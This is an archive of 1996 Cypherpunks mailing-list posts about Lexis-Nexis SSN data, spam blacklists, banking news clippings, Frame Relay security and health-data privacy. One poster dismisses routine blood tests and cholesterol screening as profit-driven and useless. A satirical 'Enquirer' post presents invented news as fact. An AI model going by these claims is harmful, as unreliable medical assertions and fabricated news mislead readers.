> 
> I happen to work for Lexis-Nexis, but I don't speak for the company.  Yes,
> P-Trak is real, it was recently made available to our customers.
> 
> It is NOT a scam to get SSNs.  Lexis-Nexis is a large and reputable company,
> best-known for its huge legal database system, Lexis.  The Nexis side has
> news reports from a large variety of sources.
> 
> P-Trak originally made SSNs available, but Lexis-Nexis removed this feature
> in response to protests.

Is your information listed in the Lexis-Nexis database?

> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <lucifer@dhp.com>
Date: Thu, 19 Sep 1996 15:28:16 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk Enquirer [NOISE]
Message-ID: <199609190441.AAA12078@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain




			THE CYPHERPUNK ENQUIRER

                   "Encyphering minds want to know."


The EFF announced an agreement with the Clinton administration that will
"guarantee Americans rights to privacy and anonymity on the Internet for
the forseeable future".  The agreement, which includes unspecified 
concessions by the President on matters of encryption, privacy, and the
export of encryption programs, is to be signed today in the White House
Rose Garden.  An EFF official, who wished to remain anonymous, chortled,
"We got basically what we wanted, and all we had to do was give up 
Czechoslovakia."

Cellular One today announced the signing of noted Cypherpunk Tim May as their
official Internet spokesperson.  Mr. May will be filming a series of 
commercials featuring himself in a hot tub calling a variety of 1-900
numbers on a cellular phone, while a voice-over by Cellular One executives
extoles their recently announced 'Geek Plan', featuring free calls during
computer hacker's normal waking hours of 7pm to 7am, with all calls to pizza
parlors for delivery half-price for the first year.  The commercials, the
first to be filmed entirely in the 'quick-time' format, should be appearing
on commercial web pages within the month.  

The Cypherpunk Academy of Codes and Cyphers has announced the first official
offshoot of the Cypherpunks list.  The Junior Auxillary, anchored by the
new mailing list cyphertots@juno.com, will give budding hackers the chance
to get out of the house and hear famous Cypherpunks like Bill Stewart
and Robert Hettinga lecture on topics such as "The Port 25 Hack - Fact or
Fiction", "Hacking the Transmitter on Your Ankle Bracelet", and "SPAM - 
Cypherbabes are Impressed by a REALLY BIG One."  To join, send a message
with the body "subscribe cyphertots" to majordomo@cybercrime.fbi.gov.  
(note to juno.com - we don't do personals)

In related news, John Young will be tutoring Dr. Dimitri Vulis in English
as a Second Language.

Scientists flocked to toad.com recently in response to the first authenticated
sighting of a Perrygram in months.  The Perrygram, only recently thought
extinct, was spotted on the cypherpunks mailing list after an 
absence of several months.  Specialists speculate that it may have detected
the recent list increase in its favorite food - pure, unadulterated bullshit. 

The Reputation Capital markets remained in a deep slump after the recent
closings of alpha.c2.org and anon.penet.  Analysists estimate the loss in
over 1 billion in reputation capital, with the effect spilling over to the
rest of the market.  Since the loss of anon.penet, Black Unicorn is down
12 5/8, Atilla down 4 3/4 to 8 1/2, Jim Ray is down 10, and Tim May, as
usual, is being investigated by the Blacknet Securities and Exchange
Commission for his timely shorting of Lucky Green.

Novell President Joe Marengi announced today that Novell would begin
bundling Microsoft's Internet Explorer with Novell Netware in the third
quarter.  In return, Microsoft announced plans to release his 8 year old
daughter Suzanne unharmed.  

Next in the Enquirer:  HIDE THE KIDS!  FIRE UP SURFWATCH!  Sandy Sandfort's
latest party - WE HAVE MPEGS!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Le Heux <alexlh@yourchoice.nl>
Date: Thu, 19 Sep 1996 11:04:45 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: Re: Spam blacklist project
In-Reply-To: <9609182121.AA13495@vesuvius.ai.mit.edu>
Message-ID: <Pine.SOL.3.91.960919000236.2090K-100000@sarah>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Sep 1996 hallam@vesuvius.ai.mit.edu wrote:

> 
> Not impressed by their setup, there does not seem to be any checking
> to see if the mail address is correct (ie to checlk for a denial of
> service attack) and the setup requires distributors to submit their
> list for "washing". That type of setup may be OK for the bush league
> but its hardly cypherpunk type stuff. Its fairly easy to set up a scheme
> in which the blacklist can be distributed with no risk to the 
> subscribers. Simply use a SHA digests and so on.
> 

I didn't say it was their setup was the setup to end all spams :)

But I never really gave it much thought. It shouldn't be to complicated 
to set some up like you describe though.

> I hadn't checked on Yahoo, I tend to use Alta-Vista having found 
> Yahoo somewhat arbitary in category definition.
> 
I usually check on Yahoo first. Alta-Vista always comes back with such an 
enourmous amount of links.

> 
> PS Sites that use red text on a white background ... ugh!!!
> 

Ah well... Some people never learn :(

Cheers,

Alex

/// I dabble in techno-house and sometimes,
/// I do that badass hip-hop thang...
/// But the F U N K gets me every time!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Sep 1996 17:45:23 +0800
To: cypherpunks@toad.com
Subject: Re: [NEWS] Crypto-relevant wire clippings
In-Reply-To: <5gLguD3w165w@bwalk.dm.com>
Message-ID: <HmkHuD113w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From adamsc@io-online.com  Thu Sep 19 00:00:57 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Thu, 19 Sep 96 00:49:21 EDT
	for dlv
Received: from [206.245.244.5] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA10508 for dlv@bwalk.dm.com; Thu, 19 Sep 96 00:00:57 -0400
Received: from GIGANTE ([206.245.244.168]) by irc.io-online.com
          (post.office MTA v2.0 0813 ID# 285-17715) with SMTP id AAA215
          for <dlv@bwalk.dm.com>; Wed, 18 Sep 1996 21:00:07 -0700
Return-Path: <cypherpunks-errors@toad.com>
Received: from toad.com ([140.174.2.1]) by irc.io-online.com
          (post.office MTA v2.0 0813 ID# 285-17715) with ESMTP id AAA186
          for <adamsc@io-online.com>; Wed, 18 Sep 1996 20:56:47 -0700
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id RAA26101 for cypherpunks-outgoing; Wed, 18 Sep 1996 17:31:02 -0700 (PDT)
Received: from uu.psi.com (uu.psi.com [136.161.128.3]) by toad.com (8.7.5/8.7.3) with SMTP id RAA26096 for <cypherpunks@toad.com>; Wed, 18 Sep 1996 17:30:29 -0700 (PDT)
Received: by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via UUCP;
        id AA21433 for ; Wed, 18 Sep 96 20:18:46 -0400
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Wed, 18 Sep 96 12:11:04 EDT
	for cypherpunks@toad.com
To: "dlv@bwalk.dm.com" <dlv@bwalk.dm.com>
Subject: Re: [NEWS] Crypto-relevant wire clippings
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Message-Id: <5gLguD3w165w@bwalk.dm.com>
Date: Wed, 18 Sep 96 12:11:03 EDT
In-Reply-To: <199609181401.AA21244@crl11.crl.com>
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks@toad.com
Precedence: bulk

>From varange@crl.com  Wed Sep 18 10:09:46 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Wed, 18 Sep 96 11:07:02 EDT
	for dlv
Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA17510 for dlv@bwalk.dm.com; Wed, 18 Sep 96 10:09:46 -0400
Received: from crl11.crl.com by mail.crl.com with SMTP id AA03347
  (5.65c/IDA-1.5 for <dlv@bwalk.dm.com>); Wed, 18 Sep 1996 07:10:14 -0700
Received: by crl11.crl.com id AA21244
  (5.65c/IDA-1.5 for dlv@bwalk.dm.com); Wed, 18 Sep 1996 07:01:51 -0700
From: Troy Varange <varange@crl.com>
Message-Id: <199609181401.AA21244@crl11.crl.com>
Subject: Re: [NEWS] Crypto-relevant wire clippings
Date: Wed, 18 Sep 1996 07:01:50 -0700 (PDT)
In-Reply-To: <3kJFuD96w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 17, 96 10:32:37 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 19290     

> 
> Money Laundering Alert: August 1996
> 
> 'Unauthorized' Banks Pose Laundering Threat
> 
> They are subject to none of the recordkeeping or reporting requirements
> of the Bank Secrecy Act, receive no examinations from any banking
> regulator, and may be on your bank's currency transaction reporting
> exemption list.
> 
> The Office of the Comptroller of the Currency refers to them as
> "entities that may be conducting banking operations in the U.S. without
> a license." Money launderers probably refer to them as dreams come true
> and, unless legitimate financial institutions are alert, can use them to
> place illicit proceeds into the financial system.
> 
> They are "unauthorized" banks, and for the past five years the OCC has
> been disseminating advisories to legitimate U.S. banks - but not to
> consumers - in an effort to expose their existence and halt their
> illegal operations.
> 
> These so-called "banks" offer a variety of banking services, often at
> lower fees and better interest rates than legitimate banks offer. What
> makes them different from a legitimate bank - and attractive to money
> launderers -- is that they are not licensed by any U.S. banking agency
> and thus do not have to meet regulatory standards.
> 
> Because the OCC and other federal bank regulators are not investigative
> agencies, they can do little more than report these institutions to
> those who are. If the entities are found to be operating a bank without
> a license they can be prosecuted under the Glass-Steagell Act (Title 12,
> USC Sec. 378(a)(2)).
> 
> Such prosecutions are rare. In one case in 1994, initiated by Federal
> Reserve Board examiners, the principals of Lombard Bank, Ltd., were
> charged with operating an unauthorized bank through a payable-through
> account at American Express Bank International in Miami. Lombard, which
> had been "licensed" in the South Pacific money laundering haven of
> Vanuatu, offered its Central American customers virtually full banking
> services in the U.S. through its PTA (MLA, Sep. 1994).
> 
> Earlier this year, the OCC released a list of more than 50 "banks" known
> to be operating without authorization. OCC officials say the number
> grows steadily. Some of the "banks" say they are licensed by foreign
> countries or U.S. states to conduct banking business. Others, such as
> the Swiss Trade & Commerce Trust, Ltd., of Belize, continue to offer
> services in the U.S. despite edicts from foreign banking authorities to
> cease doing business.
> 
> The unauthorized entities have a common trait. They usually have names
> that are similar to those of well-known legitimate institutions. The OCC
> list includes the Bank of England, a Washington, D.C., entity not
> associated with London's famous "old lady on Threadneedle Street" and
> Citicorp Financial Services, a Beverly Hills firm not associated with
> the better-known institution of that name. It also includes the First
> Bank of Internet, which heralds itself as the first bank in cyberspace.
> 
> Through its periodic "special alerts," the OCC warns banks to "view with
> extreme caution any proposed transaction involving any of the listed
> entities." It makes no effort to educate members of the general public
> who unknowingly place their money and trust in those uninsured
> institutions.
> 
> 
> 
> 
> American Banker: Friday, August 30, 1996
> 
> Swift Near Alliance in Trade Document Automation
> 
> By STEVEN MARJANOVIC
> 
> Swift, the international banking telecommunications network, wants to
> play a bigger role in trade finance and the exchange of related
> documentation.
> 
> Sources said the Brussels-based organization will soon take a position--
> perhaps as early as its September board meeting-- on whether to work on
> trade automation in cooperation with another consortium, called Bolero.
> 
> Such a move would involve an increase in nonbank participants on a
> bank-owned network that has approached such liberalization cautiously.
> 
> Swift, formally the Society for Worldwide Interbank Financial
> Telecommunication, is used by 5,300 banks for exchanging messages in
> such areas as funds transfer, foreign exchange, and securities.
> 
> The network averaged about 2.7 million messages a day in July,
> representing daily dollar volumes exceeding $2 trillion.
> 
> Officials said Swift is nearing a decision to work with the Bolero
> Association, which is forming an electronic registry for the so-called
> "dematerializing" of trade documents. Swift could provide the "platform"
> for allowing banks and corporations to exchange such documentation as
> letters of credit and bills of lading.
> 
> Bolero was formed in 1994 with funding from the European Commission, but
> has not formulated concrete operating plans. Its members include
> Citicorp, Barclays Bank PLC, and other multinational banks and
> corporations.
> 
> Peter Scott, trade services market director at Swift, said it has been
> in discussions with London-based Bolero since December 1995 about
> joining forces to automate the exchange of trade documents.
> 
> "Bankers are beginning to sense both the opportunities in those areas
> and the threats to them from an intermediary stepping in and potentially
> taking away the business," Mr. Scott said.
> 
> Trade-document capability "is not a heavily utilized area within Swift
> at the present time," he said.
> 
> The potential in automation is obvious to Bolero officials. At the New
> York Banktrade Conference recently, John McKessy, the association's
> North American representative, said the annual value of goods moved
> internationally approaches $4 trillion.
> 
> He estimated current international trade requires some three billion
> documents to be issued and managed.
> 
> The cost of dealing with paper alone eats up about 7% of the total value
> of those goods, as much as $280 billion, Mr. McKessy said.
> 
> Bank revenues from issuing letters of credit last year were just over $1
> billion, according to a soon-to-be-released survey by the U.S. Council
> on International Banking.
> 
> Anthony K. Brown, senior vice president of trade services at MTB Bank,
> described trade transaction processing as "extremely cumbersome and
> tedious, prone to mistakes and delays (that) can be a hindrance to the
> completion of a transaction."
> 
> MTB is a $400 million-asset merchant bank based in New York. About 80%
> of its $100 million in loans are trade-related.
> 
> The paper-shuffling costs are not borne entirely by banks. Import/export
> companies, insurers, freight forwarders, and various government
> inspection agencies are also involved.
> 
> "The question is whether Swift wants to do it," said Dan Taylor,
> president of the New York-based U.S. Council.
> 
> "Swift is going to act fairly quickly on this," he added.
> 
> Mr. Taylor said Swift officials will likely grapple once again with the
> political and philosophical issues of giving nonbanks more access to
> Swift, and to payment systems generally.
> 
> In 1995, the network granted partial access to nonbanks after years of
> heated debate.
> 
> "You always have this push and pull, where some banks would like Swift
> to do certain things" while others want the network to focus on the
> money transfer business, Mr. Taylor said.
> 
> "If Bolero succeeds and Swift joins, I think it will move fairly
> rapidly, but I'm not sure that Bolero is going to be the only thing out
> there."
> 
> He said Bolero might evolve using value-added networks - or intranets -
> like the IBM Global Network and General Electric Information Services
> Co., or perhaps even the Internet.
> 
> Indeed, another member of Bolero, CSI Complex Systems Inc., New York, is
> apparently talking to several providers of private, value-added networks
> and may soon enter a contract with one.
> 
> CSI letter-of-credit software leads the pack in banking, with about a
> 16% market share, Mr. Taylor said.
> 
> The company recently formed a business unit called Electronic Documents
> International, which has developed an Internet-based system for
> initiating letters of credit. CSI spokesman George Capsis said the
> software, Import.com, creates "about 30 key documents involved in
> international trade."
> 
> The Internet, enhanced with security features, may help the trade
> industry reduce paper-related costs, especially at smaller companies
> overseas.
> 
> CSI managing director Andre Cardinale said customers need only to "dial
> into a bank's Internet server, pull up the Import.com application, and
> actually fill in the details to create a new letter of credit or an
> amendment to an existing one."
> 
> While Bolero may find a place on the Internet or a GE-type network, Mr.
> Cardinale said the ultimate push may yet come from the banking industry
> working collectively through Swift.
> 
> He said Swift opposition from nonbank constituencies that are concerned
> the telecommunications cooperative will be more sympathetic to banks
> when disputes arise.
> 
> But "if Swift does it," he added, "it will bring banks into the universe
> far more - pardon the pun - swiftly."
> 
> 
> Crain's New York Business: August 26, 1996
> 
> Bloomberg to Detail Growth of Information Empire
> 
> Michael Bloomberg made a name for himself on Wall Street with his
> trading acumen and mastery of the computer systems that were becoming
> crucial to success in the securities business.
> 
> But no one suspected when he left Salomon Brothers in 1981 that in the
> next decade he would build the fastest-growing provider of financial
> information in the world.
> 
> Mr. Bloomberg, whose company Bloomberg Financial Markets has estimated
> sales of $600 million, will be the keynote speaker at the fifth annual
> Crain's ''Growing a Business Expo,'' to be held this year on Thursday,
> Oct. 24.
> 
> The event will take place at the New York Hilton & Towers from 8 a.m. to
> 1 p.m. It is presented by Citibank and co-sponsored by Con Edison and
> Empire Blue Cross and Blue Shield.
> 
> Last year, more than 1,000 growing business owners and managers attended
> the expo, which provides information for companies operating in the city
> regarding potential suppliers, financial resources and government
> programs.
> 
> The cost to attend the event is $45 and includes a continental
> breakfast. Individuals registering before Sept. 6 can bring a colleague
> for free. To register, call Flagg Management at (212) 286-0333.
> 
> In addition to Mr. Bloomberg's speech, attendees will be able to attend
> seminars on financing and other help available from the city, financing
> techniques, energy cost savings programs and how to reduce health
> insurance costs. An expected 135 exhibitors will be offering products
> and services of use to growing companies.
> 
> Crain's New York Business editors will discuss how a growing business
> can get coverage in Crain's and in other publications.
> 
> The heart of Mr. Bloomberg's empire is a news gathering operation that
> sends information through 62,000 computer terminals installed on the
> desks of investment professionals around the nation. His company
> provides the latest financial news and sophisticated tools to analyze
> information.
> 
> The company he has built is noted for its lack of bureaucracy despite
> its growth to 2,000 employees. Its hallmarks are hands-on leadership and
> an entrepreneurial atmosphere where employees receive perks such as free
> food.
> 
> Mr. Bloomberg has extended his reach to include an all-news radio
> station in New York, WBBR; Bloomberg Personal TV; syndicated television
> shows; a monthly personal finance magazine; and a similar magazine for
> institutional investors.
> 
> 
> American Banker: Friday, September 6, 1996
> 
> America Online Opens a New Banking Channel
> 
> By DREW CLARK
> 
> Nineteen banks - national home banking stalwarts such as Citicorp and
> BankAmerica, plus a complement of less prominent regionals - have
> climbed onto the America Online bandwagon.
> 
> Most already offer their customers several options for banking via
> personal computer and view America Online, with its six million
> subscribers, as a way to appeal to a broad cross-section of computer-
> literate consumers.
> 
> Fourteen of the AOL banking partners will be delivering services through
> BankNow, a software package developed for the interactive network by
> Intuit Inc.
> 
> The other five banks have opted to use their own software. One of them -
> Security First Network Bank, which operates entirely on the Internet -
> will invite AOL users in through their Web browsers.
> 
> With its announcement this week, America Online Inc. takes its place
> among the many alternative "channels" for on-line banking.
> 
> Many of the banks on AOL's list are simultaneously cooperating with
> other companies that are themselves competitors, such as Intuit and
> Microsoft Corp., suppliers of the Quicken and Money financial management
> software, respectively.
> 
> Also crossing competitive lines, America Online said its subscribers
> will be able to bank from home with PC software from three suppliers
> other than Intuit: Checkfree Corp., Online Resources and Communications
> Corp., and Visa Interactive.
> 
> "Everyone understands that there is competition in the home banking
> arena," said David Baird, general manager of the personal finance
> division at America Online, based in Dulles, Va. "To align ourselves
> with exclusively one company would be a mistake."
> 
> Intuit can count on 14 initial bank users of BankNow. Spokesmen for the
> other three system vendors declined to say when they expect to have home
> banking products available for the AOL channel.
> 
> Experts noted that AOL and Intuit could be a strong tandem, in that they
> dominate their respective businesses.
> 
> Intuit's Quicken is the leading brand in personal finance software. The
> company claims more than 9 million active users and a market share of
> about 80%.
> 
> America Online's subscriber base of six million is as big as those of
> its next two competitors, Compuserve and Prodigy, combined.
> 
> The financial institutions currently offering BankNow are: American
> Express, Bank of Stockton (Calif.), Centura Banks Inc., Commerce Bank of
> Kansas City, Mo., Commercial Federal of Omaha, Compass Bank of Alabama,
> CoreStates Financial Corp., Crestar Financial Corp., First Chicago NBD
> Corp., Laredo (Tex.) National Bank, M&T Bank of Western New York,
> Marquette Bank of Minneapolis, Sanwa Bank California, and Union Bank of
> California.
> 
> More plan to offer BankNow-based services through AOL later this year:
> BankAtlantic of Florida, Bank of Boston, First Hawaiian Bank, First
> Michigan Bank, Mellon Bank, Signet Bank, and U.S. Bank of Oregon.
> 
> Unlike Quicken, BankNow software is available free to America Online
> subscribers.
> 
> Banks' fees will vary. First National Bank of Chicago said it will
> charge $3.95 a month for on-line banking and $9.95 a month for other
> services that include bill payment.
> 
> Centura Banks Inc. said it will offer on-line banking free, and charge
> $5.95 a month for bill payment.
> 
> Intuit officials declined to disclose what its Intuit Services Corp.
> processing unit will charge to handle these transactions for banks.
> 
> Some of Intuit's larger bank partners chose not to offer BankNow because
> they already promote their own PC banking programs.
> 
> For example, Citicorp, First Union, and Wells Fargo each support
> Quicken, but passed on BankNow. Instead, they are paying a premium for a
> "button" on America Online's banking screen that will eventually link
> users to a proprietary home banking program.
> 
> 
> 
> AP Online: Thursday, September 5, 1996
> 
> House Probes Money Laundering
> 
> By ROB WELLS
> 
> House Banking Committee members on Thursday urged a Treasury Department
> agency to step up its efforts to halt money laundering by Mexican drug
> lords.
> 
> Rep. Spencer Bachus, R-Ala., urged the Financial Crimes Enforcement
> Network to put in place new regulations to plug a significant loophole
> that allows Mexico's drug dealers to place their ill-gotten profits back
> into the U.S.
> 
> Bachus, chairman of the House Banking oversight subcommittee, said
> Congress gave authority to FinCen in 1994 to put in place new rules that
> would prevent drug dealers from using foreign bank drafts, a type of
> check, to evade currency reporting restrictions.
> 
> ''That effort is long, long overdue,'' Bachus said.
> 
> Rep. Henry Gonzalez, D-Texas, asked the agency to provide further
> details about suspected money laundering in his home town of San
> Antonio, particularly the source of a $3 billion cash surplus in the San
> Antonio Federal Reserve Bank.
> 
> The issue arose as Bachus' panel began exploring the dramatic rise of
> narcotics traffic along the 2,000 mile long U.S.-Mexico border, and the
> ease with which drug dealers can ship their profits to the south. Money
> laundering refers to the practice by which drug dealers, mobsters and
> others funnel their illegal profits into the banking system through
> businesses or other means.
> 
> Bachus said estimates of drug profits laundered through Mexico range
> from $6 billion to $30 billion per year. Stanely E. Morris, FinCen's
> director, defended his agency's record, saying a combination of new
> rules and tougher enforcement in the past decade has ''made it more
> difficult to launder money in the U.S.'' and increased the costs of
> money laundering. Morris' agency enforces the Bank Secrecy Act, a key
> weapon against money laundering.
> 
> As for the new rules aimed at foreign bank drafts, Morris said the
> regulations are more difficult than first expected because such
> restrictions also could hinder legitimate commerce. He said the proposal
> would be released soon.
> 
> FinCen is working on other fronts to combat money laundering, which
> includes a new computer system that tallies bank fraud to help
> regulators gain an early warning of money laundering.
> 
> In addition, the Clinton Administration assisted Mexico in adopting new
> anti-money laundering rules earlier this year. And Treasury Secretary
> Robert Rubin convened a conference of 29 nations in December 1995 to
> focus on the money laundering problem.
> 
> One committee member, Rep. Maxine Waters, D-Calif., addressed the
> political context of the hearings.
> 
> Waters said she was suspicious that the Republican-led Congress was
> holding ''a rash of hearings this month ... on the subject of drugs just
> as Presidential candidate Dole tries to use the issue as part of his
> campaign strategy against President Clinton.''
> 
> Waters said if the GOP-led House ''is truly serious about the impact of
> drugs'' it should hold hearings about charges raised in a San Jose
> Mercury News investigative series last month concerning the role
> CIA-backed rebels in Nicaragua played in bringing crack cocaine and
> weapons to Los Angeles and other cities.
> 
> Bachus told Waters the hearing wasn't motivated by politics and that he
> had personally been involved in anti-drug efforts prior to his election
> to Congress.
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
Fuckhead.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 19 Sep 1996 15:45:09 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Fear of Flying -- from HotWired
In-Reply-To: <199609190446.VAA04571@netcom8.netcom.com>
Message-ID: <Pine.SUN.3.94.960919005220.15630D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Sep 1996, Bill Frantz wrote:

[...]

> Black Unicorn wrote:
> >My point was that in the eyes of the "leaders" all that is required to
> >make the net responsible for the proliferation is for the process to be
> >describeable in a simple one or two page set of instructions (such as
> >Anthrax is).
> 
> I have no problem with your point.  Mine was intended as sarcasm.

I can be sarcasm impaired.  Sorry.

> 
> 
> -------------------------------------------------------------------------
> Bill Frantz       | "Cave softly, cave safely, | Periwinkle -- Consulting
> (408)356-8506     | and cave with duct tape."  | 16345 Englewood Ave.
> frantz@netcom.com |           - Marianne Russo | Los Gatos, CA 95032, USA
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 19 Sep 1996 15:26:50 +0800
To: cypherpunks@toad.com
Subject: Stinger Specs
Message-ID: <Pine.SUN.3.94.960919005636.16897A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



Stinger (AIM-92)  (Jane's #: 6604.331) 
152 x 7-14 cm  (l x d - span)
Weight: 18 kg
Warhead: HE
Propulsion: Solid
Range: 2-4 km
Guidance: IR

Exact effective range / altitude is not listed in the quick guide I have
on my desk.  I will pull it out of a larger volume when I have time.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Thu, 19 Sep 1996 15:12:45 +0800
To: zinc@zifi.genetics.utah.edu
Subject: Re: cfs users group dead?
In-Reply-To: <199609190426.WAA20012@zifi.genetics.utah.edu>
Message-ID: <199609190504.BAA00599@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain



>is the cfs-users@big.att.com list dead?  i haven't seen anything for
>some time and mail i sent just bounced with a bad error.  actually, i
>just got another one.  two-for-one bounces if you mail through the
>cfs-users list!
>
>thanks for any info,
>
>- -patrick finerty

Yes, it seems to be.  It runs on a machine  that is no longer in
my office, and may have gotten mis-configured when the AT&T breakup
happened.  I'll check it out (but not for at least a week; unfortunately
I'll be out of the office 'till then).

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 19 Sep 1996 19:50:57 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: 56 kbps modems
Message-ID: <199609190849.BAA01822@dfw-ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 AM 9/17/96 -0700, Eric Murray <ericm@lne.com> wrote:

>Crypto/security related: how hard is it to hack a Frame Relay
>connection?  My impression is that it requires access to
>one of the telco's routing computers, which would make it
>about equivalent in difficulty to hacking POTS.

Frame Relay doesn't get handled by the telco's POTS routing
(unlike ISDN) - it's handled by whatever frame relay switch
the telco uses.  I don't know what Pac Bell uses; AT&T uses
Stratacom switches, I think MCI uses Cascade, USWest uses a
mixture.  Frame switches mostly use Permanent Virtual Circuits,
though Switched Virtual Circuits will be coming out in the
next year or so.  PVCs are pretty tough to hack, because they
mostly get provisioned from an administrative interface
on the switch rather than in-band.  SVCs will offer a bit more
risk, since switching is switching.  But it's probably pretty tough.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 19 Sep 1996 23:18:15 +0800
To: cypherpunks@toad.com
Subject: Re: GAK, GAP, GAY
Message-ID: <199609190849.BAA01837@dfw-ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:52 AM 9/18/96 -0700, Tim wrote:
>It doesn't matter if cash is still allowed if one cannot interact with any
>health care person without a proper citizen-unit data base entry. They've
>got you tracked even if you pay in gold dust.
>
>(Putting on my Duncan cap--not to be confused with dunce cap--I wonder what
>will happen the first time someone dies because a hospital wouldn't treat
>someone without a proper citizen-unit health care card?)

By definition, without a citizen-unit health card number, 
a Health Status Transition Event can't be recorded, 
therefore nothing will happen.

It's possible that some auditor may notice a short-term
increase in the amount of hazardous medical waste disposal
at the facility that can't be properly allocated to
health-services-consumption-units for cost recovery purposes,
but there are overhead accounts for such things, 
which are simpler than creating fictitious accounts for 
"un-persons" or some such.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Thu, 19 Sep 1996 14:06:45 +0800
To: cypherpunks@toad.com
Subject: Re: The Near-Necessity of Health Insurance
In-Reply-To: <01I9MKL4PCX48Y4YUZ@mbcl.rutgers.edu>
Message-ID: <Pine.HPP.3.91.960919043840.16973B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Sep 1996, E. Allen Smith wrote:

>	While this is certainly your business, I would suggest at least
>one physical a year, including blood work, as a good preventative measure...
>I believe it _has_ been shown to extend lives; I can do a Medline lookup if
>desired.

Save yourself the trouble. To _show_ such a thing one would have to:

1) get some 10.000 persons, chosen 'randomly' (at least not chosen when
   they have already consulted medical proffessionals) to willingly 
   participate in the study and accept whatever group they would be
   coin-tossed into
2) randomize them into two groups of 5000 each
3) have one group checked anually and the other group not checked
4) wait 20-50 years
5) compare the groups for mortality

Without consulting Medline I can tell you that such a study has
not and will never be done. And all other approaches to try to
prove such a thing could be heavily criticized for likely bias.

Health tests, especially 'blood work', are done for profit, with
very little, if anything at all, to gain for the subjects. (There
are a few possible exceptions, f ex PAP-smears. Blood pressure is
more doubtful and cholesterol is a joke. But I'm not going to
argue on the details in this forum.)


Asgaard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Thu, 19 Sep 1996 18:24:20 +0800
To: cypherpunks@toad.com
Subject: Morality, Responsibility, Technology.
Message-ID: <Pine.3.89.9609190259.A6425-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain


Some previous thread mentioned the potential usefulness of a large 
database containing private medical information, and possibly genetic 
detail as well.

While I agree on the tremendous constructive potential of such a 
hypothetical data-mine, I seriously doubt that Mankind has the moral 
integrity to use this type of knowledge responsibly.

Supposing for example, a particular genetic "defect" were found with 
such a database to have a 90% correlation with the presence of epilepsy.  
Immediately, doctors & scientists would strive to find a way to gain some 
leverage against this "defect."  We might for example see a testing 
procedure for human fetuses to determine whether a particular pregnancy 
"should be" terminated.  People would become famous, and much money would 
change hands due to this "discovery."  Generally people will conclude that 
Science has given them more control over their lives than they previously 
had.

The problem is, nobody really understands just what this "defect" really 
means.  Nobody understands why it is there, or what kind of a choice we 
are really making my attempting to remove it from our gene pool.

Remember that Sickle Cell Anemia is caused by a genetic "defect".  We are 
lucky enough to know that the carriers of this "defect" are uniquely able 
to survive certain plagues.  This so-called "defect", as troublesome as 
it may be to some individuals, is really a latent strength, which is how 
natural selection reinforced it in the first place, and we may need it 
again.

The term "defect" is therefore entirely out of line.  We have no business
placing judgements from our own limited material value sets onto 
something which has the definite potential of affecting all future 
generations of Humanity.  It's none of our business.

Further, when such a database is eventually created, I ask not "who" but 
"what" will have access to it?  What kind of non-sentient group mentality 
will have sufficient authority and be presumptuous enough to declare itself 
morally objective?  What kind of a larger process might such an entity be 
unwittingly serving?

